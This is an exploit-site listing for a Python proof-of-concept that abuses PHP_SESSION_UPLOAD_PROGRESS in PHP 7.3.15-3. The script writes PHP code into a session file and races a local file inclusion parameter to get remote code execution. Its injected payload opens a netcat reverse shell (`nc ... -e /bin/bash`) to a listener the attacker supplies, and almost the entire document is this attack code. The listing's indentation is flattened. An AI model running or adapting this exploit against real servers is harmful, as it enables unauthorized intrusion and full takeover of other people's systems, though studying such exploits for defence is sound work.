Exploit for PHP 7.3.15-3 PHP_SESSION_UPLOAD_PROGRESS Session Data Injection

Name: Exploit for PHP 7.3.15-3 PHP_SESSION_UPLOAD_PROGRESS Session Data Injection
Rating: 5 (207 reviews)
2021-07-27 | CVSS 0.2
## https://sploitus.com/exploit?id=PACKETSTORM:163681
# Exploit Title: PHP 7.3.15-3 - 'PHP_SESSION_UPLOAD_PROGRESS' Session Data Injection  
# Date: 26/7/2021  
# Exploit Author: SiLvER | Faisal Alhadlaq  
# Tested on: PHP Version is 7.3.15-3  
# This poc will abusing PHP_SESSION_UPLOAD_PROGRESS then will trigger race condition to get remote code execution, the script will return a reverse shell using netcat  
  
#!/usr/bin/python3  
"""  
Usage :  
  
python3 poc.p <Target URL> <ListnerIP> <ListnerPORT>  
python3 poc.py https://xyz.xyz 192.168.1.15 1337  
  
"""  
import requests  
import threading  
import datetime  
import sys  
  
x = datetime.datetime.now()  
addSeconds = datetime.timedelta(0, 10)  
newDatetime = x + addSeconds  
  
def fuzz():  
targetIP = sys.argv[1]  
listnerIP = sys.argv[2]  
listnerPORT = sys.argv[3]  
global newDatetime  
while True:  
try:  
if datetime.datetime.now() > newDatetime:  
exit()  
# proxies = {  
# "http": "http://127.0.0.1:8080",  
# "https": "https://127.0.0.1:8080",  
# }  
sessionName = "SiLvER"  
url = targetIP  
s = requests.Session()  
cookies = {'PHPSESSID': sessionName}  
files = {'PHP_SESSION_UPLOAD_PROGRESS': (None, '<?php `nc '+ listnerIP +' '+ listnerPORT + ' -e /bin/bash`;?>'), 'file': ('anyThinG', 'Abusing PHP_SESSION_UPLOAD_PROGRESS By Faisal Alhadlaq '*100, 'application/octet-stream')}  
# You need to change the parameter in your case , here the vulnerabile parameter is (lfi)  
params = (('lfi', '/var/lib/php/sessions/sess_'+sessionName),)  
x = s.post(url, files=files, params=params, cookies=cookies, allow_redirects=False, verify=False)#, proxies=proxies  
  
except Exception as error:  
print(error)  
exit()  
def main():  
print("\n(+) PoC for Abusing PHP_SESSION_UPLOAD_PROGRESS By SiLvER\n")  
threads = []  
for _ in range(20):  
t = threading.Thread(target=fuzz)  
t.start()  
threads.append(t)  
for thread in threads:  
thread.join  
  
if __name__ == "__main__":  
if len(sys.argv) < 4:  
print("\n(-) Usage: {} <Target URL> <ListnerIP> <ListnerPORT>".format(sys.argv[0]))  
print("(-) eg: {} https://xyz.xyz 192.168.1.15 1337 ".format(sys.argv[0]))  
print("\n(=) By SiLvER \n")  
exit()   
else:  
main()